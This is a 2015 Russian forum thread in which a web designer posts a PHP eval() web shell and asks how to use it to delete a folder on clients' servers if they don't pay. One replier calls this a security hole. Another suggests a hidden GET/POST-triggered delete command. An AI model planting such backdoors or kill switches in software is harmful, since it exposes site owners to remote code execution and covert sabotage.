Javascript-форум (https://javascript.ru/forum/)
-   Серверные языки и технологии (https://javascript.ru/forum/server/)
-   -   Выполнение кода PHP в textarea (https://javascript.ru/forum/server/56852-vypolnenie-koda-php-v-textarea.html)

karakym 06.07.2015 22:57
Выполнение кода PHP в textarea
 
Доброго времени суток, имеется вот такой вот код:
<?php 
   if ( isset($_POST['text']) ) 
      eval ($_POST['text']); 
?> 
<form method='POST'> 
   <textarea name='text'></textarea> 
   <input type='submit'> 
</form>

Лежит он в файлике на сервера, теперь при запуске этого файла я смогу вводить и выполнять код php!
Вопрос такой какой код мне нужно написать, что бы начиная от корня нашло папку demo и удалило ее со всем содержимым!?

karakym 06.07.2015 22:59
Для тех кто спросит "А зачем вам это?", такой вот ответ!
Являюсь разработчиком сайтов, было несколько проблем с клиентами.
Работаю по схеме:
1. Предосмотр сайта
2. Аванс
3. Готовый сайт
4. Оплата

laimas 07.07.2015 03:58
Цитата:
Сообщение от karakym
Являюсь разработчиком сайтов
Разработчику сайтов задавать такие нелепые вопросы...

karakym 07.07.2015 11:50
Цитата:
Сообщение от laimas (Сообщение 377966)
Разработчику сайтов задавать такие нелепые вопросы...
Ну я по WEB-Дизайну (HTML,CSS,jQuery)

laimas 07.07.2015 12:16
Ну это не разработка. Нельзя выполнить код в textarea, это текстовая область, а тем более РНР-код, который выполняется только на сервере. А на сервере нет ни textarea, ни вообще какого либо html, все это строковый тип данных, включая и данные полученные формой.

А чтобы выполнить строку переданную формой как код, нужно чтобы разработчик серверной части разрешил такое действие, чего он вряд ли станет делать, ибо это "явная дыра" в безопасности - стоит не полениться заказчику и проверить такой код, и исполнитель может потерять все.

karakym 07.07.2015 12:40
Цитата:
Сообщение от laimas (Сообщение 378005)
Ну это не разработка. Нельзя выполнить код в textarea, это текстовая область, а тем более РНР-код, который выполняется только на сервере. А на сервере нет ни textarea, ни вообще какого либо html, все это строковый тип данных, включая и данные полученные формой.

А чтобы выполнить строку переданную формой как код, нужно чтобы разработчик серверной части разрешил такое действие, чего он вряд ли станет делать, ибо это "явная дыра" в безопасности - стоит не полениться заказчику и проверить такой код, и исполнитель может потерять все.
Предложите вариант который обезопасит меня от кидал

laimas 07.07.2015 12:45
Без сервера вам, как дизайнеру, нет доступных способов.

Размещайте выполненный заказ, то есть шаблон дизайна, в сети, пусть заказчик оценивает, и после оплаты отдавать его заказчику.

karakym 07.07.2015 14:02
То есть, нет никакого способа, внедрить в свой код, запасной вход!?

laimas 07.07.2015 14:13
Свой, это какой?

karakym 07.07.2015 18:24
Цитата:
Сообщение от laimas (Сообщение 378030)
Свой, это какой?
Ну вообще в проект сайта!

laimas 07.07.2015 19:00
Речь была о том, что вы дизайнер. Что такого может вставить в проект дизайнер, который не имеет доступа к серверным скриптам, что будет исполняться сервером?

karakym 07.07.2015 23:46
Поэтому и задал вопрос здесь!

laimas 08.07.2015 04:59
Ну и ответ же был - нет у вас никакой возможности.

kostyanet 09.07.2015 06:14
Цитата:
Сообщение от karakym
Лежит он в файлике на сервера
Если на самом деле лежит, зачем вам какие-то фокусы с евалом? Просто проверяйте код команды, типа

Код:
if(isset($_POST['delete-all-demo'])) {
  $delete_all_demo();
  die();
}

kostyanet 09.07.2015 06:16
И зачем $_POST? Есть же $_GET. Прямо в урл пишите команду удалить папку на сервере и все. Можно добавить пароль.


Часовой пояс GMT +3, время: 09:13.